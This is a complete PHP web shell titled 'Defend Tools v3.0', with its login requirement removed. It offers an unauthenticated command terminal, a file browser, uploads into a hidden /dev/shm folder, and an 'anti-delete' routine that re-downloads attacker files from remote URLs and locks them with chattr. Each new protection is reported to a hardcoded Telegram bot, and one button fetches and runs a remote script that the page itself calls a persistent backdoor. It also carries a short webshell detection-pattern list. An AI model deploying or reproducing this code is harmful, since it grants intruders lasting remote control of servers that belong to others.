<?php
session_start();

// Configuration
define('LOG_FILE', '/dev/shm/antidelete.log');
define('BG_IMAGE', 'https://i.pinimg.com/originals/28/d9/a5/28d9a5107af5d4c4da117c05b4393b83.gif');
define('HIDDEN_FOLDER', '/dev/shm/.php_protected_'.md5(__FILE__));
define('SESSION_TIMEOUT', 1800); // 30 minutes session timeout

// Telegram Bot Configuration
define('TELEGRAM_BOT_TOKEN', '7998549437:AAF0Dn70CTNyx6rZsvyclIvP0BuPGYRfT5o');
define('TELEGRAM_CHAT_ID', '6230136394');

// Handle theme preference
if (isset($_GET['theme'])) {
    $_SESSION['theme'] = $_GET['theme'] === 'dark' ? 'dark' : 'light';
}

$current_theme = $_SESSION['theme'] ?? 'light';

// Session timeout check
if (isset($_SESSION['logged_in']) && (time() - ($_SESSION['last_activity'] ?? 0) > SESSION_TIMEOUT)) {
    log_action("Session timed out for user {$_SESSION['username']}");
    session_destroy();
    header('Location: '.$_SERVER['PHP_SELF']);
    exit;
}
$_SESSION['last_activity'] = time();

// Create hidden folder
if (!file_exists(HIDDEN_FOLDER)) {
    @mkdir(HIDDEN_FOLDER, 01111, true);
    @chmod(HIDDEN_FOLDER, 01111);
    @file_put_contents(HIDDEN_FOLDER.'/.htaccess', "Deny from all");
    @chmod(HIDDEN_FOLDER.'/.htaccess', 0444);
    @file_put_contents(HIDDEN_FOLDER.'/index.html', "");
    @chmod(HIDDEN_FOLDER.'/index.html', 0444);
}

// Function to send Telegram notification
function send_telegram_notification($message) {
    $url = "https://api.telegram.org/bot".TELEGRAM_BOT_TOKEN."/sendMessage";
    $data = [
        'chat_id' => TELEGRAM_CHAT_ID,
        'text' => $message,
        'parse_mode' => 'HTML'
    ];
    
    $options = [
        'http' => [
            'header' => "Content-type: application/x-www-form-urlencoded\r\n",
            'method' => 'POST',
            'content' => http_build_query($data)
        ]
    ];
    
    $context = stream_context_create($options);
    return @file_get_contents($url, false, $context);
}

// Protection functions
function protect_file($path) {
    if (!file_exists($path)) return false;
    
    @chmod($path, 0444);
    if (function_exists('exec')) {
        @exec("chattr +i ".escapeshellarg($path)." 2>&1", $output, $return);
    }
    return true;
}

function unprotect_file($path) {
    if (!file_exists($path)) return false;
    
    if (function_exists('exec')) {
        @exec("chattr -i ".escapeshellarg($path)." 2>&1", $output, $return);
    }
    @chmod($path, 0644);
    return true;
}

// Core functions
function log_action($message) {
    $log_message = date('[Y-m-d H:i:s] ').$message.PHP_EOL;
    file_put_contents(LOG_FILE, $log_message, FILE_APPEND);
    if (filesize(LOG_FILE) > 1024*1024) {
        file_put_contents(LOG_FILE, substr(file_get_contents(LOG_FILE), -512000));
    }
}

function get_remote_content($url) {
    $content = false;
    
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $content = curl_exec($ch);
        curl_close($ch);
    } 
    elseif (ini_get('allow_url_fopen')) {
        $content = @file_get_contents($url);
    }
    
    return $content !== false ? $content : false;
}

function restore_file($path, $url) {
    $content = get_remote_content($url);
    if ($content === false) {
        log_action("Failed to fetch content from $url");
        return false;
    }
    
    $dir = dirname($path);
    if (!file_exists($dir)) {
        mkdir($dir, 01111, true);
        @chmod($dir, 01111);
        log_action("Created directory $dir");
    }
    
    if (file_exists($path)) {
        unprotect_file($path);
    }
    
    if (file_put_contents($path, $content) === false) {
        log_action("Failed to write content to $path");
        return false;
    }
    
    protect_file($path);
    log_action("Restored file $path from $url");
    return true;
}

function check_and_restore($path, $url) {
    if (!file_exists($path) || filesize($path) == 0) {
        return restore_file($path, $url);
    }
    
    $current_content = @file_get_contents($path);
    $expected_content = get_remote_content($url);
    
    if ($expected_content === false) {
        log_action("Failed to verify content from $url");
        return false;
    }
    
    if ($current_content !== $expected_content) {
        return restore_file($path, $url);
    }
    
    if (is_writable($path)) {
        protect_file($path);
    }
    
    return true;
}

// Auto-restore functionality
function auto_restore_files() {
    if (!file_exists('config.json')) return;
    
    $config = json_decode(file_get_contents('config.json'), true) ?: [];
    foreach ($config as $item) {
        if ($item['active'] ?? false) {
            check_and_restore($item['path'], $item['url']);
        }
    }
}

// Webshell Scanner
function scan_webshell($directory) {
    $results = [];
    $suspicious_patterns = [
        '/eval\s*\(/i',
        '/exec\s*\(/i',
        '/system\s*\(/i',
        '/passthru\s*\(/i',
        '/shell_exec\s*\(/i',
        '/base64_decode\s*\(/i',
        '/obfuscate/i',
        '/backdoor/i',
        '/webshell/i'
    ];
    
    try {
        $iterator = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($directory, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        
        foreach ($iterator as $file) {
            if ($file->isFile() && in_array($file->getExtension(), ['php', 'php5', 'phtml'])) {
                $content = @file_get_contents($file->getPathname());
                if ($content !== false) {
                    foreach ($suspicious_patterns as $pattern) {
                        if (preg_match($pattern, $content)) {
                            $results[] = [
                                'file' => $file->getPathname(),
                                'pattern' => $pattern,
                                'mtime' => date('Y-m-d H:i:s', $file->getMTime())
                            ];
                        }
                    }
                }
            }
        }
    } catch (Exception $e) {
        log_action("Webshell scan error: " . $e->getMessage());
    }
    
    return $results;
}

// Auto-set logged in (REMOVED LOGIN REQUIREMENT)
$_SESSION['logged_in'] = true;
$_SESSION['username'] = 'admin';
$_SESSION['last_activity'] = time();

// Anti-delete management
if (isset($_POST['add_antidelete']) && ($_SESSION['logged_in'] ?? false)) {
    $file_path = $_POST['file_path'];
    $file_url = $_POST['file_url'];
    
    if (!empty($file_path) && !empty($file_url)) {
        $config = json_decode(@file_get_contents('config.json'), true) ?: [];
        $config[] = ['path' => $file_path, 'url' => $file_url, 'active' => true];
        file_put_contents('config.json', json_encode($config, JSON_PRETTY_PRINT));
        
        if (check_and_restore($file_path, $file_url)) {
            $success_message = "Added protection for $file_path";
            log_action("Added new protection for $file_path");
            
            $script_url = (isset($_SERVER['HTTPS']) ? 'https://' : 'http://').$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
            send_telegram_notification("🛡️ New Anti-Delete Protection Added\n\nFile: $file_path\nURL: $file_url\n\nAccess: $script_url");
        } else {
            $error_message = "Failed to add protection for $file_path";
            log_action("Failed to add protection for $file_path");
        }
    } else {
        $error_message = "Both file path and URL are required";
    }
}

// File upload to hidden folder
if (isset($_FILES['php_file']) && ($_SESSION['logged_in'] ?? false)) {
    $upload_dir = HIDDEN_FOLDER.'/';
    if (!file_exists($upload_dir)) {
        mkdir($upload_dir, 01111, true);
        @chmod($upload_dir, 01111);
    }
    
    $file_name = basename($_FILES['php_file']['name']);
    $target_file = $upload_dir.$file_name;
    
    if (move_uploaded_file($_FILES['php_file']['tmp_name'], $target_file)) {
        protect_file($target_file);
        $upload_success = "File $file_name uploaded and protected in hidden folder";
        log_action("Uploaded protected file to $target_file");
    } else {
        $upload_error = "File upload failed";
        log_action("Failed to upload file to $target_file");
    }
}

// Toggle protection
if (isset($_GET['toggle']) && isset($_GET['id']) && ($_SESSION['logged_in'] ?? false)) {
    $id = (int)$_GET['id'];
    $config = json_decode(@file_get_contents('config.json'), true) ?: [];
    
    if (isset($config[$id])) {
        $config[$id]['active'] = !$config[$id]['active'];
        file_put_contents('config.json', json_encode($config, JSON_PRETTY_PRINT));
        
        if ($config[$id]['active']) {
            check_and_restore($config[$id]['path'], $config[$id]['url']);
            log_action("Activated protection for {$config[$id]['path']}");
        } else {
            unprotect_file($config[$id]['path']);
            log_action("Deactivated protection for {$config[$id]['path']}");
        }
        
        if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') {
            header('Content-Type: application/json');
            echo json_encode(['status' => 'success', 'active' => $config[$id]['active']]);
            exit;
        }
    }
    header('Location: '.$_SERVER['PHP_SELF']);
    exit;
}

// Terminal command execution
if (isset($_POST['command']) && ($_SESSION['logged_in'] ?? false)) {
    $command = $_POST['command'];
    $output = [];
    $return_var = 0;
    
    if (function_exists('exec')) {
        @exec($command . " 2>&1", $output, $return_var);
        $terminal_output = implode("\n", $output);
    } else {
        $terminal_output = "exec() function is disabled on this server";
    }
    
    log_action("Executed command: $command\nOutput: $terminal_output");
}

// GS Auto Install
if (isset($_POST['install_gs']) && ($_SESSION['logged_in'] ?? false)) {
    $install_command = "curl -fsSL http://nossl.segfault.net/deploy-all.sh -o deploy-all.sh && bash deploy-all.sh 2>&1";
    $output = shell_exec($install_command);
    $gs_install_output = $output ? $output : "Installation completed, but no output was captured.";
    log_action("GS Installation Output:\n$gs_install_output");
}

// Webshell Scan
if (isset($_POST['scan_webshell']) && ($_SESSION['logged_in'] ?? false)) {
    $scan_dir = $_POST['scan_dir'] ?? $_SERVER['DOCUMENT_ROOT'];
    $webshell_results = scan_webshell($scan_dir);
    log_action("Performed webshell scan on $scan_dir");
}

// File Explorer
if (isset($_GET['explore']) && ($_SESSION['logged_in'] ?? false)) {
    $current_dir = $_GET['explore'] ?? $_SERVER['DOCUMENT_ROOT'];
    $current_dir = realpath($current_dir);
    
    if ($current_dir === false || !is_dir($current_dir)) {
        $file_explorer_error = "Invalid directory path";
        $current_dir = $_SERVER['DOCUMENT_ROOT'];
    }
    
    $file_list = [];
    if (is_dir($current_dir)) {
        $items = scandir($current_dir);
        foreach ($items as $item) {
            if ($item !== '.' && $item !== '..') {
                $path = $current_dir . DIRECTORY_SEPARATOR . $item;
                $file_list[] = [
                    'name' => $item,
                    'path' => $path,
                    'is_dir' => is_dir($path),
                    'size' => is_file($path) ? filesize($path) : 0,
                    'mtime' => date('Y-m-d H:i:s', filemtime($path))
                ];
            }
        }
    }
}

// Background restoration
if ($_SESSION['logged_in'] ?? false) {
    auto_restore_files();
}

$config = file_exists('config.json') ? json_decode(file_get_contents('config.json'), true) : [];

// Format server information
function format_server_info() {
    $info = [];
    $info['Server Software'] = $_SERVER['SERVER_SOFTWARE'] ?? 'N/A';
    $info['Server Protocol'] = $_SERVER['SERVER_PROTOCOL'] ?? 'N/A';
    $info['Server Name'] = $_SERVER['SERVER_NAME'] ?? 'N/A';
    $info['Server Address'] = $_SERVER['SERVER_ADDR'] ?? 'N/A';
    $info['Server Port'] = $_SERVER['SERVER_PORT'] ?? 'N/A';
    $info['Document Root'] = $_SERVER['DOCUMENT_ROOT'] ?? 'N/A';
    $info['PHP Version'] = phpversion();
    $info['PHP SAPI'] = php_sapi_name();
    $info['PHP Memory Limit'] = ini_get('memory_limit');
    $info['PHP Max Execution Time'] = ini_get('max_execution_time');
    $info['Operating System'] = php_uname();
    $info['System Load'] = function_exists('sys_getloadavg') ? implode(', ', sys_getloadavg()) : 'N/A';
    $info['Disk Free Space'] = function_exists('disk_free_space') ? 
        round(disk_free_space('/') / (1024*1024*1024), 2) . ' GB' : 'N/A';
    $info['Disk Total Space'] = function_exists('disk_total_space') ? 
        round(disk_total_space('/') / (1024*1024*1024), 2) . ' GB' : 'N/A';
    
    $output = '';
    foreach ($info as $key => $value) {
        $output .= "<strong>{$key}:</strong> " . htmlspecialchars($value) . "<br>\n";
    }
    
    return $output;
}

// System Resources
function get_system_resources() {
    $resources = [];
    $resources['cpu_usage'] = function_exists('sys_getloadavg') ? sys_getloadavg()[0] : 'N/A';
    $resources['memory_total'] = function_exists('exec') ? 
        shell_exec("free -m | awk 'NR==2{print $2}'") : 'N/A';
    $resources['memory_used'] = function_exists('exec') ? 
        shell_exec("free -m | awk 'NR==2{print $3}'") : 'N/A';
    $resources['disk_free'] = function_exists('disk_free_space') ? 
        round(disk_free_space('/') / (1024*1024*1024), 2) : 'N/A';
    $resources['disk_total'] = function_exists('disk_total_space') ? 
        round(disk_total_space('/') / (1024*1024*1024), 2) : 'N/A';
    
    return $resources;
}
?>
<!DOCTYPE html>
<html lang="en" data-theme="<?= $current_theme ?>">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Defend Tools v3.0</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"/>
    <style>
        :root {
            --primary: #1e90ff;
            --secondary: #2d3436;
            --success: #27ae60;
            --danger: #c0392b;
            --warning: #f1c40f;
            --info: #0984e3;
            --terminal-bg: #1e1e1e;
            --terminal-text: #00ff00;
            --accent: #6c5ce7;
        }
        
        [data-theme="light"] {
            --bg-color: #f8f9fa;
            --text-color: #2d3436;
            --card-bg: #ffffff;
            --border-color: #dee2e6;
            --header-bg: var(--secondary);
            --header-text: #ffffff;
            --table-header: #f1f3f5;
            --table-border: #dee2e6;
            --input-bg: #ffffff;
            --input-border: #ced4da;
            --log-bg: #f1f3f5;
            --terminal-bg: #1e1e1e;
            --terminal-text: #00aa00;
        }
        
        [data-theme="dark"] {
            --bg-color: #121212;
            --text-color: #e9ecef;
            --card-bg: #1e1e1e;
            --border-color: #343a40;
            --header-bg: #0d0d0d;
            --header-text: #ffffff;
            --table-header: #2d2d2d;
            --table-border: #343a40;
            --input-bg: #2d2d2d;
            --input-border: #495057;
            --log-bg: #2d2d2d;
            --terminal-bg: #000000;
            --terminal-text: #00ff00;
        }
        
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
            transition: all 0.3s ease;
        }
        
        body {
            font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            line-height: 1.6;
            background-color: var(--bg-color);
            color: var(--text-color);
        }
        
        .login-bg {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: url('<?= BG_IMAGE ?>') center/cover no-repeat;
            z-index: -1;
            opacity: 0.6;
            filter: blur(2px);
        }
        
        .container {
            max-width: 1400px;
            margin: 0 auto;
            padding: 20px;
        }
        
        .header {
            background: linear-gradient(135deg, var(--secondary), var(--accent));
            color: var(--header-text);
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0,0,0,0.3);
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 30px;
        }
        
        .header h1 {
            margin: 0;
            font-size: 2rem;
            font-weight: 700;
        }
        
        .card {
            background: var(--card-bg);
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0,0,0,0.15);
            padding: 25px;
            margin-bottom: 25px;
            border: 1px solid var(--border-color);
        }
        
        .form-group {
            margin-bottom: 20px;
        }
        
        label {
            display: block;
            margin-bottom: 8px;
            font-weight: 600;
            color: var(--text-color);
        }
        
        input[type="text"], 
        input[type="password"], 
        input[type="file"],
        select, textarea {
            width: 100%;
            padding: 12px;
            background-color: var(--input-bg);
            color: var(--text-color);
            border: 1px solid var(--input-border);
            border-radius: 6px;
            font-family: inherit;
            font-size: 1rem;
        }
        
        input:focus, select:focus, textarea:focus {
            outline: none;
            border-color: var(--primary);
            box-shadow: 0 0 0 3px rgba(30, 144, 255, 0.2);
        }
        
        button, .btn {
            background: linear-gradient(135deg, var(--primary), var(--accent));
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 6px;
            cursor: pointer;
            font-size: 1rem;
            font-weight: 500;
        }
        
        button:hover, .btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(0,0,0,0.2);
        }
        
        .btn-danger {
            background: linear-gradient(135deg, var(--danger), #d63031);
        }
        
        .btn-success {
            background: linear-gradient(135deg, var(--success), #2ecc71);
        }
        
        .btn-warning {
            background: linear-gradient(135deg, var(--warning), #e67e22);
        }
        
        .btn-info {
            background: linear-gradient(135deg, var(--info), #00b894);
        }
        
        .alert {
            padding: 15px;
            margin-bottom: 20px;
            border-radius: 6px;
            border-left: 5px solid transparent;
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .alert-success {
            background: rgba(39, 174, 96, 0.1);
            border-left-color: var(--success);
        }
        
        .alert-error {
            background: rgba(192, 57, 43, 0.1);
            border-left-color: var(--danger);
        }
        
        table {
            width: 100%;
            border-collapse: separate;
            border-spacing: 0;
            margin-bottom: 20px;
        }
        
        th, td {
            padding: 15px;
            text-align: left;
            border-bottom: 1px solid var(--table-border);
        }
        
        th {
            background: var(--table-header);
            font-weight: 600;
            position: sticky;
            top: 0;
        }
        
        .status-active {
            color: var(--success);
            font-weight: bold;
        }
        
        .status-inactive {
            color: var(--danger);
            font-weight: bold;
        }
        
        .login-container {
            max-width: 450px;
            margin: 100px auto;
            background: rgba(30, 30, 30, 0.95);
            backdrop-filter: blur(8px);
            border-radius: 12px;
            box-shadow: 0 8px 24px rgba(0,0,0,0.4);
        }
        
        .login-header {
            background: linear-gradient(135deg, var(--secondary), var(--accent));
            color: white;
            padding: 25px;
            text-align: center;
            border-radius: 12px 12px 0 0;
        }
        
        .login-body {
            padding: 30px;
        }
        
        .theme-switcher {
            padding: 8px 15px;
            border-radius: 6px;
            background: var(--primary);
            color: white;
            font-size: 0.9rem;
            text-decoration: none;
        }
        
        .footer {
            text-align: center;
            margin-top: 40px;
            padding: 20px;
            color: var(--text-color);
            font-size: 0.9rem;
        }
        
        .footer a {
            color: var(--primary);
            text-decoration: none;
        }
        
        .terminal {
            background: var(--terminal-bg);
            color: var(--terminal-text);
            font-family: 'JetBrains Mono', monospace;
            padding: 20px;
            border-radius: 6px;
            height: 400px;
            overflow-y: auto;
            margin-bottom: 20px;
            box-shadow: inset 0 0 10px rgba(0,0,0,0.3);
        }
        
        .terminal-input {
            display: flex;
            align-items: center;
            gap: 10px;
        }
        
        .terminal-prompt {
            color: var(--terminal-text);
            font-weight: bold;
        }
        
        .terminal-command {
            background: var(--terminal-bg);
            color: var(--terminal-text);
            border: 1px solid var(--terminal-text);
            border-radius: 4px;
            padding: 10px;
            flex-grow: 1;
        }
        
        .tabs {
            display: flex;
            border-bottom: 2px solid var(--border-color);
            margin-bottom: 25px;
        }
        
        .tab {
            padding: 12px 25px;
            cursor: pointer;
            border-radius: 6px 6px 0 0;
            margin-right: 5px;
            background: var(--card-bg);
            font-weight: 500;
        }
        
        .tab.active {
            background: var(--primary);
            color: white;
            font-weight: 600;
        }
        
        .tab-content {
            display: none;
        }
        
        .tab-content.active {
            display: block;
        }
        
        .gs-install {
            background: rgba(39, 174, 96, 0.1);
            border-left: 5px solid var(--success);
            padding: 20px;
            border-radius: 6px;
            margin-bottom: 25px;
        }
        
        @keyframes pulse {
            0% { transform: scale(1); }
            50% { transform: scale(1.05); }
            100% { transform: scale(1); }
        }
        
        .pulse {
            animation: pulse 2s infinite;
        }
        
        .server-info, .resource-monitor {
            background: var(--log-bg);
            padding: 20px;
            border-radius: 6px;
            margin-bottom: 25px;
            font-family: 'JetBrains Mono', monospace;
            line-height: 1.6;
        }
        
        .server-info strong, .resource-monitor strong {
            color: var(--primary);
            display: inline-block;
            min-width: 200px;
        }
        
        .file-explorer table {
            background: var(--card-bg);
            border-radius: 6px;
            overflow: hidden;
        }
        
        .file-explorer .file-name {
            cursor: pointer;
        }
        
        .file-explorer .file-name:hover {
            color: var(--primary);
        }
        
        .progress-bar {
            background: var(--border-color);
            border-radius: 4px;
            height: 20px;
            overflow: hidden;
        }
        
        .progress-bar-fill {
            background: var(--primary);
            height: 100%;
            transition: width 0.3s ease;
        }
        
        @media (max-width: 768px) {
            .container {
                padding: 15px;
            }
            
            .header {
                flex-direction: column;
                gap: 15px;
            }
            
            .header h1 {
                font-size: 1.5rem;
            }
            
            .tabs {
                flex-wrap: wrap;
                gap: 10px;
            }
            
            .tab {
                flex: 1 1 100%;
                text-align: center;
            }
            
            .login-container {
                margin: 30px 15px;
            }
            
            .server-info strong, .resource-monitor strong {
                min-width: 140px;
            }
            
            table {
                display: block;
                overflow-x: auto;
                white-space: nowrap;
            }
        }
        
        @media (max-width: 480px) {
            .header h1 {
                font-size: 1.2rem;
            }
            
            .card {
                padding: 15px;
            }
            
            button, .btn {
                padding: 10px 15px;
                font-size: 0.9rem;
            }
        }
    </style>
</head>
<body>
        <div class="container">
            <div class="header animate__animated animate__fadeInDown">
                <h1>Defend Tools <small>v3.0</small></h1>
                <div class="header-actions">
                    <a href="?theme=<?= $current_theme === 'dark' ? 'light' : 'dark' ?>" class="theme-switcher">
                        <i class="fas <?= $current_theme === 'dark' ? 'fa-sun' : 'fa-moon' ?>"></i>
                        <?= $current_theme === 'dark' ? 'Light Mode' : 'Dark Mode' ?>
                    </a>
                </div>
            </div>
            
            <?php if (isset($success_message)): ?>
                <div class="alert alert-success animate__animated animate__fadeIn">
                    <i class="fas fa-check-circle"></i> <?= htmlspecialchars($success_message) ?>
                </div>
            <?php endif; ?>
            
            <?php if (isset($error_message)): ?>
                <div class="alert alert-error animate__animated animate__shakeX">
                    <i class="fas fa-exclamation-circle"></i> <?= htmlspecialchars($error_message) ?>
                </div>
            <?php endif; ?>
            
            <div class="tabs animate__animated animate__fadeInUp">
                <div class="tab active" data-tab="antidelete"><i class="fas fa-shield-alt"></i> Anti-Delete</div>
                <div class="tab" data-tab="terminal"><i class="fas fa-terminal"></i> Terminal</div>
                <div class="tab" data-tab="file-explorer"><i class="fas fa-folder-open"></i> File Explorer</div>
                <div class="tab" data-tab="tools"><i class="fas fa-tools"></i> Tools</div>
            </div>
            
            <div class="tab-content active" id="antidelete-tab">
                <div class="card animate__animated animate__fadeIn">
                    <h2><i class="fas fa-shield-alt"></i> Add Anti-Delete Protection</h2>
                    <form method="post">
                        <div class="form-group">
                            <label for="file_path">File Path</label>
                            <input type="text" id="file_path" name="file_path" placeholder="/var/www/html/file.php" required>
                        </div>
                        <div class="form-group">
                            <label for="file_url">Content URL</label>
                            <input type="text" id="file_url" name="file_url" placeholder="https://example.com/file.txt" required>
                        </div>
                        <button type="submit" name="add_antidelete" class="btn-success">
                            <i class="fas fa-plus-circle"></i> Add Protection
                        </button>
                    </form>
                </div>
                
                <div class="card animate__animated animate__fadeIn">
                    <h2><i class="fas fa-upload"></i> Upload PHP File</h2>
                    <?php if (isset($upload_success)): ?>
                        <div class="alert alert-success"><i class="fas fa-check-circle"></i> <?= htmlspecialchars($upload_success) ?></div>
                    <?php elseif (isset($upload_error)): ?>
                        <div class="alert alert-error"><i class="fas fa-exclamation-circle"></i> <?= htmlspecialchars($upload_error) ?></div>
                    <?php endif; ?>
                    <form method="post" enctype="multipart/form-data">
                        <div class="form-group">
                            <label for="php_file">Select PHP File</label>
                            <input type="file" id="php_file" name="php_file" accept=".php" required>
                        </div>
                        <button type="submit" class="btn-success"><i class="fas fa-cloud-upload-alt"></i> Upload & Protect</button>
                    </form>
                </div>
                
                <div class="card animate__animated animate__fadeIn">
                    <h2><i class="fas fa-list"></i> Active Protections</h2>
                    <?php if (empty($config)): ?>
                        <p>No active protections found.</p>
                    <?php else: ?>
                        <table id="protections-table">
                            <thead>
                                <tr>
                                    <th>File Path</th>
                                    <th>Source URL</th>
                                    <th>Status</th>
                                    <th>Actions</th>
                                </tr>
                            </thead>
                            <tbody>
                                <?php foreach ($config as $id => $item): ?>
                                    <tr data-id="<?= $id ?>">
                                        <td><?= htmlspecialchars($item['path']) ?></td>
                                        <td><a href="<?= htmlspecialchars($item['url']) ?>" target="_blank"><?= htmlspecialchars($item['url']) ?></a></td>
                                        <td class="status-cell">
                                            <span class="status-<?= $item['active'] ? 'active' : 'inactive' ?>">
                                                <?= $item['active'] ? 'ACTIVE' : 'INACTIVE' ?>
                                            </span>
                                        </td>
                                        <td>
                                            <a href="#" class="btn toggle-protection" data-id="<?= $id ?>">
                                                <?= $item['active'] ? 'Deactivate' : 'Activate' ?>
                                            </a>
                                        </td>
                                    </tr>
                                <?php endforeach; ?>
                            </tbody>
                        </table>
                    <?php endif; ?>
                </div>
            </div>
            
            <div class="tab-content" id="terminal-tab">
                <div class="card animate__animated animate__fadeIn">
                    <h2><i class="fas fa-terminal"></i> Web Terminal</h2>
                    <div class="terminal" id="terminal-output">
                        <?php 
                        if (isset($terminal_output)) {
                            echo htmlspecialchars($terminal_output);
                        } else {
                            echo "Welcome to Defend Tools Terminal\n";
                            echo "Type your commands below\n\n";
                            echo "System Info:\n";
                            echo "OS: " . php_uname() . "\n";
                            echo "PHP: " . phpversion() . "\n";
                            echo "Server: " . $_SERVER['SERVER_SOFTWARE'] . "\n";
                        }
                        ?>
                    </div>
                    <form method="post" id="terminal-form">
                        <div class="terminal-input">
                            <span class="terminal-prompt">$</span>
                            <input type="text" name="command" class="terminal-command" id="terminal-command" autocomplete="off" required>
                            <button type="submit" class="btn-success"><i class="fas fa-play"></i> Execute</button>
                        </div>
                    </form>
                </div>
            </div>
            
            <div class="tab-content" id="file-explorer-tab">
                <div class="card file-explorer animate__animated animate__fadeIn">
                    <h2><i class="fas fa-folder-open"></i> File Explorer</h2>
                    <?php if (isset($file_explorer_error)): ?>
                        <div class="alert alert-error"><i class="fas fa-exclamation-circle"></i> <?= htmlspecialchars($file_explorer_error) ?></div>
                    <?php endif; ?>
                    <div class="form-group">
                        <label>Current Directory: <?= htmlspecialchars($current_dir ?? $_SERVER['DOCUMENT_ROOT']) ?></label>
                    </div>
                    <?php if (!empty($file_list)): ?>
                        <table>
                            <thead>
                                <tr>
                                    <th>Name</th>
                                    <th>Type</th>
                                    <th>Size</th>
                                    <th>Last Modified</th>
                                </tr>
                            </thead>
                            <tbody>
                                <?php foreach ($file_list as $item): ?>
                                    <tr>
                                        <td class="file-name">
                                            <?php if ($item['is_dir']): ?>
                                                <a href="?explore=<?= urlencode($item['path']) ?>">
                                                    <i class="fas fa-folder"></i> <?= htmlspecialchars($item['name']) ?>
                                                </a>
                                            <?php else: ?>
                                                <i class="fas fa-file"></i> <?= htmlspecialchars($item['name']) ?>
                                            <?php endif; ?>
                                        </td>
                                        <td><?= $item['is_dir'] ? 'Directory' : 'File' ?></td>
                                        <td><?= $item['is_dir'] ? '-' : number_format($item['size'] / 1024, 2) . ' KB' ?></td>
                                        <td><?= htmlspecialchars($item['mtime']) ?></td>
                                    </tr>
                                <?php endforeach; ?>
                            </tbody>
                        </table>
                    <?php else: ?>
                        <p>No files or directories found.</p>
                    <?php endif; ?>
                </div>
            </div>
            
            <div class="tab-content" id="tools-tab">
                <div class="card animate__animated animate__fadeIn">
                    <h2><i class="fas fa-tools"></i> System Tools</h2>
                    
                    <div class="gs-install">
                        <h3><i class="fas fa-download"></i> GS Auto Installer</h3>
                        <p>Install GS (Global Socket) with one click. This will deploy a persistent backdoor.</p>
                        <?php if (isset($gs_install_output)): ?>
                            <div class="alert alert-info">
                                <h4>Installation Output:</h4>
                                <pre><?= htmlspecialchars($gs_install_output) ?></pre>
                            </div>
                        <?php endif; ?>
                        <form method="post">
                            <button type="submit" name="install_gs" class="btn-success pulse">
                                <i class="fas fa-magic"></i> Install GS
                            </button>
                        </form>
                    </div>
                    
                    <div class="webshell-scanner">
                        <h3><i class="fas fa-shield-virus"></i> Webshell Scanner</h3>
                        <form method="post">
                            <div class="form-group">
                                <label for="scan_dir">Scan Directory</label>
                                <input type="text" id="scan_dir" name="scan_dir" value="<?= htmlspecialchars($_SERVER['DOCUMENT_ROOT']) ?>" required>
                            </div>
                            <button type="submit" name="scan_webshell" class="btn-warning">
                                <i class="fas fa-search"></i> Scan Now
                            </button>
                        </form>
                        <?php if (isset($webshell_results)): ?>
                            <div class="mt-4">
                                <h4>Scan Results:</h4>
                                <?php if (empty($webshell_results)): ?>
                                    <div class="alert alert-success">
                                        <i class="fas fa-check-circle"></i> No suspicious files found
                                    </div>
                                <?php else: ?>
                                    <table>
                                        <thead>
                                            <tr>
                                                <th>File Path</th>
                                                <th>Suspicious Pattern</th>
                                                <th>Last Modified</th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                            <?php foreach ($webshell_results as $result): ?>
                                                <tr>
                                                    <td><?= htmlspecialchars($result['file']) ?></td>
                                                    <td><?= htmlspecialchars($result['pattern']) ?></td>
                                                    <td><?= htmlspecialchars($result['mtime']) ?></td>
                                                </tr>
                                            <?php endforeach; ?>
                                        </tbody>
                                    </table>
                                <?php endif; ?>
                            </div>
                        <?php endif; ?>
                    </div>
                    
                    <h3 class="mt-4"><i class="fas fa-server"></i> Server Information</h3>
                    <div class="server-info">
                        <?= format_server_info() ?>
                    </div>
                    
                    <h3 class="mt-4"><i class="fas fa-chart-line"></i> System Resources</h3>
                    <div class="resource-monitor">
                        <?php $resources = get_system_resources(); ?>
                        <div><strong>CPU Usage:</strong> <?= htmlspecialchars($resources['cpu_usage']) ?>%</div>
                        <div class="mt-2">
                            <strong>Memory Usage:</strong>
                            <?php if ($resources['memory_total'] !== 'N/A'): ?>
                                <div class="progress-bar">
                                    <div class="progress-bar-fill" style="width: <?= ($resources['memory_used'] / $resources['memory_total']) * 100 ?>%"></div>
                                </div>
                                <?= htmlspecialchars($resources['memory_used']) ?> MB / <?= htmlspecialchars($resources['memory_total']) ?> MB
                            <?php else: ?>
                                N/A
                            <?php endif; ?>
                        </div>
                        <div class="mt-2">
                            <strong>Disk Usage:</strong>
                            <?php if ($resources['disk_total'] !== 'N/A'): ?>
                                <div class="progress-bar">
                                    <div class="progress-bar-fill" style="width: <?= (($resources['disk_total'] - $resources['disk_free']) / $resources['disk_total']) * 100 ?>%"></div>
                                </div>
                                <?= htmlspecialchars($resources['disk_free']) ?> GB / <?= htmlspecialchars($resources['disk_total']) ?> GB
                            <?php else: ?>
                                N/A
                            <?php endif; ?>
                        </div>
                    </div>
                </div>
            </div>
            
            <div class="card animate__animated animate__fadeIn">
